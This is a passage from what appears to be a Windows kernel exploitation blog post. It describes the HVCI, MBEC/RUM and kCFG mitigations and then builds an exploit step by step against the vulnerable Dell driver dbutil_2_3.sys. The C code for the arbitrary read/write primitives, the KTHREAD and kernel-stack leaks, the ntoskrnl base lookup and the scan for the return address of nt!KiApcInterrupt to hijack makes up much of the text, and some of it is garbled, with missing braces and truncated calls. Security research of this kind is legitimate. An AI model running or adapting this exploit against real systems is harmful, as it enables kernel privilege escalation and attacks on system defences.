I won’t get into the nitty-gritty details of the nuanced differences between RUM and MBEC, but these are solutions which mitigate the exact scenario I just mentioned. Essentially what happens is that anytime execution is in the kernel on Windows, all of the user-mode pages as non-executable. Here is how this would look (please note that the EPTE β€œbits” are just β€œpsuedo” EPTE bits, and are not indicative of what the EPTE bits actually look like).

First, the token-stealing payload is allocated in user-mode as RWX. The PTE is then corrupted to mark the shellcode page as a kernel-mode page.

Then, as we know, the function pointer is overwritten and execution returns to user-mode (but the code is executed in context of the kernel).

Notice what happens above. At the EPTE level (this doesn’t occur at the PTE level) the page containing the shellcode is marked as non-executable. Although the diagram shows us clearing the execute bit, the way the user-mode pages are marked as non-executable is actually done by adding an extra bit in the EPTE structure that allows the EPTE for the user-mode page to be marked as non-executable while execution is residing in the kernel (e.g. the code segment is β€œin ring 0”). This bit is a member of the EPTE structure that we can refer to as β€œExecuteForUserMode”.

This is an efficient way to mark user-mode code pages as non-executable. When kernel-mode code execution occurs, all of the EPTEs for the user-mode pages are simply just marked as non-executable.

MBEC is really great - but what about computers which support HVCI but don’t support MBEC (which is a hardware technology)? For these cases Microsoft implemented RUM (Restricted User Mode). RUM achieves the same thing as MBEC, but in a different way. RUM essentially forces the hypervisor to keep a second set of EPTEs - with this β€œnew” set having all user-mode pages marked as non-executable. So, essentially using the same method as loading a new PML4 address into CR3 for β€œnormal” paging - the hypervisor can load the β€œsecond” set of extended page tables (with this β€œnew/second” set marking all user-mode as non-executable) into use. This means each time execution transitions from kernel-mode to user-mode, the paging structures are swapped out - which increases the overhead of the system. This is why MBEC is less strenuous - as it can just mark a bit in the EPTEs. However, when MBEC is not supported - the EPTEs don’t have this ExecuteForUserMode bit - and rely on the second set of EPTEs.

At this point we have spent a lot of time talking about HVCI, MBEC, and RUM. We can come to the following conclusions now:

  1. PTE manipulation to achieve unsigned-code execution is impossible
  2. Any unsigned-code execution in the kernel is impossible

Knowing this, a different approach is needed. Let’s talk about now how we can use an arbitrary read/write primitive to our advantage to get around HVCI, MBEC/RUM, without being limited to only hot-swapping tokens for privilege escalation.

From Read/Write To Arbitrary Kernel-Mode Function Invocation

I did a writeup of a recent Dell BIOS driver vulnerability awhile ago, where I achieved unsigned-code execution in the kernel via PTE manipulation. Afterwards I tweeted out that readers should take into account that this exploit doesn’t consider VBS/HVCI. I eventually received a response from @d_olex on using a different method to take advantage of a kernel-mode vulnerability, with HVCI enabled, by essentially putting together your own kernel-mode API calls.

This was about a year ago - and I have been β€œchewing” on this idea for awhile. Dmytro later released a library outlining this concept.

This technique is the basis for how we will β€œget around” VBS/HVCI in this blog. We can essentially instrument a kernel-mode ROP chain that will allow us to call into any kernel-mode API we wish (while redirecting execution in a way that doesn’t trigger Kernel Control Flow Guard, or kCFG).

Why might we want to do this - in-lieu of the inability to execute shellcode, as a result of HVCI? The beauty of executing unsigned-code is the fact that we aren’t just limited to something like token stealing. Shellcode also provides us a way to execute arbitrary Windows API functions, or further corrupt memory. Think about something like a Cobalt Strike Beacon agent - it leverages Windows API functions for network communications, etc. - and is foundational to most malware.

Although with HVCI we can’t invoke our own shellcode in the kernel - it is still possible to β€œemulate” what kernel-mode shellcode may intend to do, which is calling arbitrary functions in kernel mode. Here is how we can achieve this:

  1. In our exploit, we can create a β€œdummy” thread in a suspended state via CreateThread.
  2. Assuming our exploit is running from a β€œnormal” process (running in medium integrity), we can use NtQuerySystemInformation to leak the KTHREAD object associated with the suspended thread. From here we can leak KTHREAD.StackBase - which would give us the address of the kernel-mode stack in order to write to it (each thread has its own stack, and stack control is a must for a ROP chain)
  3. We can locate a return address on the stack and corrupt it with our first ROP gadget, using our kernel arbitrary write vulnerability (this gets around kCFG, or Control Flow Guard in the kernel, since kCFG doesn’t inspect backwards edge control-flow transfers like ret. However, in the future when kCET (Control-Flow Enforcement Technology in the Windows kernel) is mainstream on Windows systems, ROP will not work - and this exploit technique will be obsolete).
  4. We then can use our ROP chain in order to call an arbitrary kernel-mode API. After we have called our intended kernel mode API(s), we then end our ROP chain with a call to the kernel-mode function nt!ZwTerminateThread - which allows us to β€œgracefully” exit our β€œdummy” thread without needing to use ROP to restore the execution we hijacked.
  5. We then call ResumeThread on the suspended thread in order to kick off execution.

Again - I just want to note. This is not an β€œHVCI bypass” post. HVCI doesn’t not suffer from any vulnerability that this blog post intends to exploit. Instead, this blog shows an alternative method of exploitation that allows us to call any kernel-mode API without triggering HVCI.

Before continuing on - let’s just briefly touch on why we are opting to overwrite a return address on the stack instead of a function pointer - as many of my blogs have done this in the past. As we saw with my previous browser exploitation blog series, CFG is a mitigation that is pretty mainstream on Windows systems. This is true since Windows 10 RS2 - when it came to the kernel. kCFG is present on most systems today - and it is an interesting topic. The CFG bitmap consists of all β€œvalid” functions used in control-flow transfers. The CFG dispatch functions check this bitmap when an indirect-function call happens to ensure that a function pointer is not overwritten with a malicious function. The CFG bitmap (in user mode) is protected by DEP - meaning the bitmap is read-only, so an attacker cannot modify it (the bitmap is stored in ntdll!LdrSystemDllInitBlock+0x8). We can use our kernel debugger to switch our current process to a user-mode process which loads ntdll.dll to verify this via the PTE.

This means an attacker would have to first bypass CFG (in context of a binary exploit which hijacks control-flow) in order to call an API like VirtualProtect to mark this page as writable. Since the permissions are enforced by DEP - the kernel is the security boundary which protects the CFG bitmap, as the PTE (stored in kernel mode) describes the bitmap as read-only. However, when talking about kCFG (in the kernel) there would be nothing that protects the bitmap - since historically the kernel was the highest security boundary. If an adversary has an arbitrary kernel read/write primitive - an adversary could just modify the kCFG bitmap to make everything a valid call target, since the bitmap is stored in kernel mode. This isn’t good, and means we need an β€œimmutable” boundary to protect this bitmap. Recall, however, that with HVCI there is a higher security boundary - the hypervisor!

kCFG is only fully enabled when HVCI is enabled. SLAT is used to protect the kCFG bitmap. As we can see below, when we attempt to overwrite the bitmap, we get an access violation. This is due to the fact that although the PTE for the kCFG bitmap says it is writable, the EPTE can enforce that this page is not writable - and therefore, with kCFG, non-modifiable by an adversary.

So, since we cannot just modify the bitmap to allow us to call anywhere in the address space, and since kCFG will protect function pointers (like nt!HalDispatchTable + 0x8) and not return addresses (as we saw in the browser exploitation series) - we can simply overwrite a return address to hijack control flow. As mentioned previously, kCET will mitigate this - but looking at my current Windows 11 VM (which has a CPU that can support kCET), kCET is not enabled. This can be checked via nt!KeIsKernelCetEnabled and nt!KeIsKernelCetAuditModeEnabled (both return a boolean - which is false currently).

Now that we have talked about control-flow hijacking, let’s see how this looks practically! For this blog post we will be using the previous Dell BIOS driver exploit I talked about to demonstrate this. To understand how the arbitrary read/write primitive works, I highly recommend you read that blog first. To summarize briefly, there are IOCTLs within the driver that allow us to read one kernel-mode QWORD at a time and to write one QWORD at a time, from user mode, into kernel mode.

β€œDummy Thread” Creation to KTHREAD Leak

First, our exploit begins by defining some IOCTL codes and some NTSTATUS codes.

// Vulnerable IOCTL codes
#define IOCTL_READ_CODE 0x9B0C1EC4

// NTSTATUS codes
#define STATUS_SUCCESS 0x00000000

Let’s also outline our - read64() and write64(). These functions give us an arbitrary read/write primitive (I won’t expand on these. See the blog post related to the vulnerability for more information.


ULONG64 read64(HANDLE inHandle, ULONG64 WHAT)
	// Buffer to send to the driver (read primitive)
	ULONG64 inBuf[4] = { 0 };

	// Values to send
	ULONG64 one = 0x4141414141414141;
	ULONG64 two = WHAT;
	ULONG64 three = 0x0000000000000000;
	ULONG64 four = 0x0000000000000000;

	// Assign the values
	inBuf[0] = one;
	inBuf[1] = two;
	inBuf[2] = three;
	inBuf[3] = four;

	// Interact with the driver
	DWORD bytesReturned = 0;

	BOOL interact = DeviceIoControl(

	// Error handling
	if (!interact)
		// Bail out
		goto exit;

		// Return the QWORD
		return inBuf[3];

// Execution comes here if an error is encountered

	// Close the handle before exiting

	// Return an error
	return (ULONG64)1;


	// Buffer to send to the driver (write primitive)
	ULONG64 inBuf1[4] = { 0 };

	// Values to send
	ULONG64 one1 = 0x4141414141414141;
	ULONG64 two1 = WHERE;
	ULONG64 three1 = 0x0000000000000000;
	ULONG64 four1 = WHAT;

	// Assign the values
	inBuf1[0] = one1;
	inBuf1[1] = two1;
	inBuf1[2] = three1;
	inBuf1[3] = four1;

	// Interact with the driver
	DWORD bytesReturned1 = 0;

	BOOL interact = DeviceIoControl(

	// Error handling
	if (!interact)
		// Bail out
		goto exit;

		// Return TRUE
		return TRUE;

// Execution comes here if an error is encountered

	// Close the handle before exiting

	// Return FALSE (arbitrary write failed)
	return FALSE;

Now that we have our primitives established, we start off by obtaining a handle to the driver in order to communicate with it. We will need to supply this value for our read/write primitives.

HANDLE getHandle(void)
	// Obtain a handle to the driver
	HANDLE driverHandle = CreateFileA(

	// Error handling
	if (driverHandle == INVALID_HANDLE_VALUE)
		// Bail out
		goto exit;
		// Return the driver handle
		return driverHandle;

// Execution comes here if an error is encountered

	// Return an invalid handle
	return (HANDLE)-1;

We can invoke this function in main().

 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
int main(void)
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	HANDLE driverHandle = getHandle();

	// Error handling
	if (driverHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

// Execution comes here if an error is encountered

	// Return an error
	return 1;

After obtaining the handle, we then can setup our β€œdummy thread” by creating a thread in a suspended state. This is the thread we will perform our exploit work in. This can be achieved via CreateThread (again, the key here is to create this thread in a suspended state. More on this later).

 * @brief Function used to create a "dummy thread"
 * This function creates a "dummy thread" that is suspended.
 * This allows us to leak the kernel-mode stack of this thread.
 * @param Void.
 * @return A handle to the "dummy thread"
HANDLE createdummyThread(void)
	// Invoke CreateThread
	HANDLE dummyThread = CreateThread(

	// Error handling
	if (dummyThread == (HANDLE)-1)
		// Bail out
		goto exit;
		// Return the handle to the thread
		return dummyThread;

// Execution comes here if an error is encountered

	// Return an invalid handle
	return (HANDLE)-1;

You’ll see that our createdummyThread function returns a handle to the β€œdummy thread”. Notice that the LPTHREAD_START_ROUTINE for the thread goes to randomFunction, which we also can define. This thread will never actually execute this function via its entry point, so we will just supply a simple function which does β€œnothing”.

We then can call createdummyThread within main() to execute the call. This will create our β€œdummy thread”.

 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
int main(void)
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	HANDLE driverHandle = getHandle();

	// Error handling
	if (driverHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	// Invoke getthreadHandle() to create our "dummy thread"
	HANDLE getthreadHandle = createdummyThread();

	// Error handling
	if (getthreadHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Created the \"dummy thread\"!\n");

// Execution comes here if an error is encountered

	// Return an error
	return 1;

Now we have a thread that is running in a suspended state and a handle to the driver.

Since we have a suspended thread running now, the goal currently is to leak the KTHREAD object associated with this thread, which is the kernel-mode representation of the thread. We can achieve this by invoking NtQuerySystemInformation. The first thing we need to do is add the structures required by NtQuerySystemInformation and then prototype this function, as we will need to resolve it via GetProcAddress. For this I just add a header file named ntdll.h - which will contain this prototype (and more structures coming up shortly).

#include <Windows.h>
#include <Psapi.h>



typedef struct _SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 w018;
    WORD                 NameOffset;
    BYTE                 Name[256];

    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];

    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;

    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];

// Prototype for ntdll!NtQuerySystemInformation
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

Invoking NtQuerySystemInformation is a mechanism that allows us to leak the KTHREAD object - so we will not go over each of these structures in-depth. However, it is worthwhile to talk about NtQuerySystemInformation itself.

NtQuerySystemInformation is a function which can be invoked from a medium-integrity process. More specifically there are specific β€œclasses” from the SYSTEM_INFORMATION_CLASS enum that aren’t available to low-integrity or AppContainer processes - such as browser sandboxes. So, in this case, you would need a genuine information leak. However, since we are assuming medium integrity (this is the default integrity level Windows processes use), we will leverage NtQuerySystemInformation.

We first create a function which resolves NtQuerySystemInformation.

 * @brief Function to resolve ntdll!NtQuerySystemInformation.
 * This function is used to resolve ntdll!NtQuerySystemInformation.
 * ntdll!NtQuerySystemInformation allows us to leak kernel-mode
 * memory, useful to our exploit, to user mode from a medium
 * integrity process.
 * @param Void.
 * @return A pointer to ntdll!NtQuerySystemInformation.

NtQuerySystemInformation_t resolveFunc(void)
	// Obtain a handle to ntdll.dll (where NtQuerySystemInformation lives)
	HMODULE ntdllHandle = GetModuleHandleW(L"ntdll.dll");

	// Error handling
	if (ntdllHandle == NULL)
		// Bail out
		goto exit;

	// Resolve ntdll!NtQuerySystemInformation
	NtQuerySystemInformation_t func = (NtQuerySystemInformation_t)GetProcAddress(

	// Error handling
	if (func == NULL)
		// Bail out
		goto exit;
		// Print update
		printf("[+] ntdll!NtQuerySystemInformation: 0x%p\n", func);

		// Return the address
		return func;

// Execution comes here if an error is encountered

	// Return an error
	return (NtQuerySystemInformation_t)1;

After resolving the function, we can add a function which contains our β€œlogic” for leaking the KTHREAD object associated with our β€œdummy thread”. This function will call leakKTHREAD - which accepts a parameter, which is the thread for which we want to leak the object (in this case it is our β€œdummy thread”). This is done by leveraging the SystemHandleInformation class (which is blocked from low-integrity processes). From here we can enumerate all handles that are thread objects on the system. Specifically, we check all thread objects in our current process for the handle of our β€œdummy thread”.

 * @brief Function used to leak the KTHREAD object
 * This function leverages NtQuerySystemInformation (by
 * calling resolveFunc() to get NtQuerySystemInformation's
 * location in memory) to leak the KTHREAD object associated
 * with our previously created "dummy thread"
 * @param dummythreadHandle - A handle to the "dummy thread"
 * @return A pointer to the KTHREAD object
ULONG64 leakKTHREAD(HANDLE dummythreadHandle)
	// Set the NtQuerySystemInformation return value to STATUS_INFO_LENGTH_MISMATCH for call to NtQuerySystemInformation

	// Resolve ntdll!NtQuerySystemInformation
	NtQuerySystemInformation_t NtQuerySystemInformation = resolveFunc();

	// Error handling
	if (NtQuerySystemInformation == (NtQuerySystemInformation_t)1)
		// Print update
		printf("[-] Error! Unable to resolve ntdll!NtQuerySystemInformation. Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// Set size to 1 and loop the call until we reach the needed size
	int size = 1;

	// Output size
	int outSize = 0;

	// Output buffer

	// Error handling
	if (out == NULL)
		// Bail out
		goto exit;

	// do/while to allocate enough memory necessary for NtQuerySystemInformation
		// Free the previous memory

		// Increment the size
		size = size * 2;

		// Allocate more memory with the updated size
		out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

		// Error handling
		if (out == NULL)
			// Bail out
			goto exit;

		// Invoke NtQuerySystemInformation
		retValue = NtQuerySystemInformation(
	} while (retValue == STATUS_INFO_LENGTH_MISMATCH);

	// Verify the NTSTATUS code which broke the loop is STATUS_SUCCESS
	if (retValue != STATUS_SUCCESS)
		// Is out == NULL? If so, malloc failed and we can't free this memory
		// If it is NOT NULL, we can assume this memory is allocated. Free
		// it accordingly
		if (out != NULL)
			// Free the memory

			// Bail out
			goto exit;

		// Bail out
		goto exit;
		// NtQuerySystemInformation should have succeeded
		// Parse all of the handles, find the current thread handle, and leak the corresponding object
		for (ULONG i = 0; i < out->NumberOfHandles; i++)
			// Store the current object's type number
			// Thread object = 0x8
			DWORD objectType = out->Handles[i].ObjectTypeNumber;

			// Are we dealing with a handle from the current process?
			if (out->Handles[i].ProcessId == GetCurrentProcessId())
				// Is the handle the handle of the "dummy" thread we created?
				if (dummythreadHandle == (HANDLE)out->Handles[i].Handle)
					// Grab the actual KTHREAD object corresponding to the current thread
					ULONG64 kthreadObject = (ULONG64)out->Handles[i].Object;

					// Free the memory

					// Return the KTHREAD object
					return kthreadObject;

// Execution comes here if an error is encountered

	// Close the handle to the "dummy thread"

	// Return the NTSTATUS error
	return (ULONG64)retValue;

Here is how our main() function looks now:

 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
int main(void)
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	HANDLE driverHandle = getHandle();

	// Error handling
	if (driverHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	// Invoke getthreadHandle() to create our "dummy thread"
	HANDLE getthreadHandle = createdummyThread();

	// Error handling
	if (getthreadHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Created the \"dummy thread\"!\n");

	// Invoke leakKTHREAD()
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	// Error handling (Negative value? NtQuerySystemInformation returns a negative NTSTATUS if it fails)
	if ((!kthread & 0x80000000) == 0x80000000)
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		// Bail out
		goto exit;

	// Error handling (kthread isn't negative - but is it a kernel-mode address?)
	else if ((!kthread & 0xffff00000000000) == 0xffff00000000000 || ((!kthread & 0xfffff00000000000) == 0xfffff00000000000))
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		// Bail out
		goto exit;

	// Print update
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	// getchar() to pause execution

// Execution comes here if an error is encountered

	// Return an error
	return 1;

You’ll notice in the above code we have added a getchar() call - which will keep our .exe running after the KTHREAD object is leaked. After running the .exe, we can see we leaked the KTHREAD object of our β€œdummy thread” at 0xffffa50f0fdb8080. Using WinDbg we can parse this address as a KTHREAD object.

We have now successfully located the KTHREAD object associated with our β€œdummy” thread.

From KTHREAD Leak To Arbitrary Kernel-Mode API Calls

With our KTHREAD leak, we can also use the !thread WinDbg extension to reveal the call stack for this thread.

You’ll notice the function nt!KiApcInterrupt is a part of this kernel-mode call stack for our β€œdummy thread”. What is this?

Recall that our β€œdummy thread” is in a suspended state. When a thread is created on Windows, it first starts out running in kernel-mode. nt!KiStartUserThread is responsible for this (and we can see this in our call stack). This eventually results in nt!PspUserThreadStartup being called - which is the initial thread routine, according to Windows Internals Part 1: 7th Edition. Here is where things get interesting.

After the thread is created, the thread is then put in its β€œsuspended state”. A suspended thread, on Windows, is essentially a thread which has an APC queued to it - with the APC β€œtelling the thread” to β€œdo nothing”. An APC is a way to β€œtack on” some work to a given thread, when the thread is scheduled to execute. What is interesting is that queuing an APC causes an interrupt to be issued. An interrupt is essentially a signal that tells a processor something requires immediate attention. Each processor has a given interrupt request level, or IRQL, in which it is running. APCs get processed in an IRQL level known as APC_LEVEL, or 1. IRQL values span from 0 - 31 - but usually the most β€œcommon” ones are PASSIVE_LEVEL (0), APC_LEVEL (1), or DISPATCH_LEVEL (2). Normal user-mode and kernel-mode code run at PASSIVE_LEVEL. What is interesting is that when the IRQL of a processor is at 1, for instance (APC_LEVEL), only interrupts that can be processed at a higher IRQL can interrupt the processor. So, if the processor is running at an IRQL of APC_LEVEL, kernel-mode/user-mode code wouldn’t run until the processor is brought back down to PASSIVE_LEVEL.

The function that is called directly before nt!KiApcInterrupt in our call stack is, as mentioned, nt!PspUserThreadStartup - which is the β€œinitial thread routine”. If we examine this return address nt!PspUserThreadStartup + 0x48, we can see the following.

The return address contains the instruction mov rsi, gs:188h. This essentially will load gs:188h (the GS segment register, when in kernel-mode, points to the KPCR structure, which, at an offset of 0x180 points to the KPRCB structure. This structure contains a pointer to the current thread at an offset of 0x8 - so 0x180 + 0x8 = 0x188. This means that gs:188h points to the current thread).

When a function is called, a return address is placed onto the stack. What a return address actually is, is the address of the next instruction. You can recall in our IDA screenshot that since mov rsi, gs:188h is the instruction of the return address, this instruction must have been the β€œnext” instruction to be executed when it was pushed onto the stack. What this means is that whatever the instruction before mov rsi, gs:188h was caused the β€œfunction call” - or change in control-flow - to ntKiApcInterrupt. This means the instruction before, mov cr8, r15 was responsible for this. Why is this important?

Control registers are a per-processor register. The CR8 control register manages the current IRQL value for a given processor. So, what this means is that whatever is in R15 at the time of this instruction contains the IRQL that the current processor is executing at. How can we know what level this is? All we have to do is look at our call stack again!

The function that was called after nt!PspUserThreadStartup was nt!KiApcInterrupt. As the name insinuates, the function is responsible for an APC interrupt! We know APC interrupts are processed at IRQL APC_LEVEL - or 1. However, we also know that only interrupts which are processed at a higher IRQL than the current processors’ IRQL level can cause the processor to be interrupted.

Since we can obviously see that an APC interrupt was dispatched, we can confirm that the processor must have been executing at IRQL 0, or PASSIVE_LEVEL - which allowed the APC interrupt to occur. This again, comes back to the fact that queuing an APC causes an interrupt. Since APCs are processed at IRQL APC_LEVEL (1), the processor must be executing at PASSIVE_LEVEL (0) in order for an interrupt for an APC to be issued.

If we look at return address - we can see nt!KiApcInterrupt+0x328 (TrapFrame @ ffffa385bba350a0) contains a trap frame - which is basically a representation of the state of execution when an interrupt takes place. If we examine this trap frame - we can see that RIP was executing the instruction after the mov cr8, r15 instruction - which changes the processor where the APC interrupt was dispatched - meaning that when nt!PspUserThreadStartup executed - it allowed the processor to start allowing things like APCs to interrupt execution!

We can come to the conclusion that nt!KiApcInterrupt was executed as a result of the mov cr8, r15 instruction from nt!PspUserThreadStartup - which lowered the current processors’ IRQL level to PASSIVE_LEVEL (0). Since APCs are processed in APC_LEVEL (1), this allowed the interrupt to occur - because the processor was executing at a lower IRQL before the interrupt was issued.

The point of examining this is to understand the fact that an interrupt basically occurred, as a result of the APC being queued on our β€œdummy” thread. This APC is telling the thread basically to β€œdo nothing” - which is essentially what a suspended thread is. Here is where this comes into play for us.

When this thread is resumed, the thread will return from the nt!KiApcInterrupt function. So, what we can do is we can overwrite the return address on the stack for nt!KiApcInterrtupt with the address of a ROP gadget (the return address on this system used for this blog post is nt!KiApcInterrupt + 0x328 - but that could be subject to change). Then, when we resume the thread eventually (which can be done from user mode) - nt!KiApcInterrupt will return and it will use our ROP gadget as the return address. This will allow us to construct a ROP chain which will allow us to call arbitrary kernel-mode APIs! The key, first, is to use our leaked KTHREAD object and parse the StackBase member - using our arbitrary read primitive - to locate the stack (where this return address lives). To do this, we will being the prototype for our final β€œexploit” function titled constructROPChain().

Notice the last parameter our function receives - ULONG64 ntBase. Since we are going to be using ROP gadgets from ntoskrnl.exe, we need to locate the base address of ntoskrnl.exe in order to resolve our needed ROP gadgets. So, this means that we also need a function which resolves the base of ntoskrnl.exe using EnumDeviceDrivers. Here is how we instrument this functionality.

 * @brief Function used resolve the base address of ntoskrnl.exe.
 * @param Void.
 * @return ntoskrnl.exe base
ULONG64 resolventBase(void)
	// Array to receive kernel-mode addresses
	LPVOID* lpImageBase = NULL;

	// Size of the input array
	DWORD cb = 0;

	// Size of the array output (all load addresses).
	DWORD lpcbNeeded = 0;

	// Invoke EnumDeviceDrivers (and have it fail)
	// to receive the needed size of lpImageBase

	// lpcbNeeded should contain needed size
	lpImageBase = (LPVOID*)malloc(lpcbNeeded);

	// Error handling
	if (lpImageBase == NULL)
		// Bail out
		goto exit;

	// Assign lpcbNeeded to cb (cb needs to be size of the lpImageBase
	// array).
	cb = lpcbNeeded;

	// Invoke EnumDeviceDrivers properly.
	BOOL getAddrs = EnumDeviceDrivers(

	// Error handling
	if (!getAddrs)
		// Bail out
		goto exit;

	// The first element of the array is ntoskrnl.exe.
	return (ULONG64)lpImageBase[0];

// Execution reaches here if an error occurs

	// Return an error.
	return (ULONG64)1;

The above function called resolventBase() returns the base address of ntoskrnl.exe (this type of enumeration couldn’t be done in a low-integrity process. Again, we are assuming medium integrity). This value can then be passed in to our constructROPChain() function.

If we examine the contents of a KTHREAD structure, we can see that StackBase is located at an offset of 0x38 within the KTHREAD structure. This means we can use our arbitrary read primitive to leak the stack address of the KTHREAD object by dereferencing this offset.

We then can update main() to resolve ntoskrnl.exe and to leak our kernel-mode stack (while leaving getchar() to confirm we can leak the stack before letting the process which houses our β€œdummy thread” terminate.

 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
int main(void)
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	HANDLE driverHandle = getHandle();

	// Error handling
	if (driverHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	// Invoke getthreadHandle() to create our "dummy thread"
	HANDLE getthreadHandle = createdummyThread();

	// Error handling
	if (getthreadHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Created the \"dummy thread\"!\n");

	// Invoke leakKTHREAD()
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	// Error handling (Negative value? NtQuerySystemInformation returns a negative NTSTATUS if it fails)
	if ((!kthread & 0x80000000) == 0x80000000)
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		// Bail out
		goto exit;

	// Error handling (kthread isn't negative - but is it a kernel-mode address?)
	else if ((!kthread & 0xffff00000000000) == 0xffff00000000000 || ((!kthread & 0xfffff00000000000) == 0xfffff00000000000))
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		// Bail out
		goto exit;

	// Print update
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	// Invoke resolventBase() to retrieve the load address of ntoskrnl.exe
	ULONG64 ntBase = resolventBase();

	// Error handling
	if (ntBase == (ULONG64)1)
		// Bail out
		goto exit;

	// Invoke constructROPChain() to build our ROP chain and kick off execution
	BOOL createROP = constructROPChain(driverHandle, getthreadHandle, kthread, ntBase);

	// Error handling
	if (!createROP)
		// Print update
		printf("[-] Error! Unable to construct the ROP chain. Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// getchar() to pause execution

// Execution comes here if an error is encountered

	// Return an error
	return 1;

After running the exploit (in its current state) we can see that we successfully leaked the stack for our β€œdummy thread” - located at 0xffffa385b8650000.

Recall also that the stack grows towards the lower memory addresses - meaning that the stack base won’t actually have (usually) memory paged in/committed. Instead, we have to start going β€œup” the stack (by going down - since the stack grows towards the lower memory addresses) to see the contents of the β€œdummy thread’s” stack.

Putting all of this together, we can extend the contents of our constructROPChain() function to search our dummy thread’s stack for the target return address of nt!KiApcInterrupt + 0x328. nt!KiApcInterrupt + 0x328 is located at an offset of 0x41b718 on the version of Windows 11 I am testing this exploit on.

 * @brief Function used write a ROP chain to the kernel-mode stack
 * This function takes the previously-leaked KTHREAD object of
 * our "dummy thread", extracts the StackBase member of the object
 * and writes the ROP chain to the kernel-mode stack leveraging the
 * write64() function.
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param dummyThread - A valid handle to our "dummy thread" in order to resume it.
 * @param KTHREAD - The KTHREAD object associated with the "dummy" thread.
 * @param ntBase - The base address of ntoskrnl.exe.
 * @return Result of the operation in the form of a boolean.
BOOL constructROPChain(HANDLE inHandle, HANDLE dummyThread, ULONG64 KTHREAD, ULONG64 ntBase)
	// KTHREAD.StackBase = KTHREAD + 0x38
	ULONG64 kthreadstackBase = KTHREAD + 0x38;

	// Dereference KTHREAD.StackBase to leak the stack
	ULONG64 stackBase = read64(inHandle, kthreadstackBase);

	// Error handling
	if (stackBase == (ULONG64)1)
		// Bail out
		goto exit;

	// Print update
	printf("[+] Leaked kernel-mode stack: 0x%llx\n", stackBase);

	// Variable to store our target return address for nt!KiApcInterrupt
	ULONG64 retAddr = 0;

	// Leverage the arbitrary write primitive to read the entire contents of the stack (seven pages = 0x7000)
	// 0x7000 isn't actually commited, so we start with 0x7000-0x8, since the stack grows towards the lower
	// addresses.
	for (int i = 0x8; i < 0x7000 - 0x8; i += 0x8)
		// Invoke read64() to dereference the stack
		ULONG64 value = read64(inHandle, stackBase - i);

		// Kernel-mode address?
		if ((value & 0xfffff00000000000) == 0xfffff00000000000)
			// nt!KiApcInterrupt+0x328?
			if (value == ntBase + 0x41b718)
				// Print update
				printf("[+] Leaked target return address of nt!KiApcInterrupt!\n");

				// Store the current value of stackBase - i, which is nt!KiApcInterrupt+0x328
				retAddr = stackBase - i;

				// Break the loop if we find our address

		// Reset the value
		value = 0;

	// Print update
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

// Execution comes here if an error is encountered

	// Return the NTSTATUS error
	return (ULONG64)1;

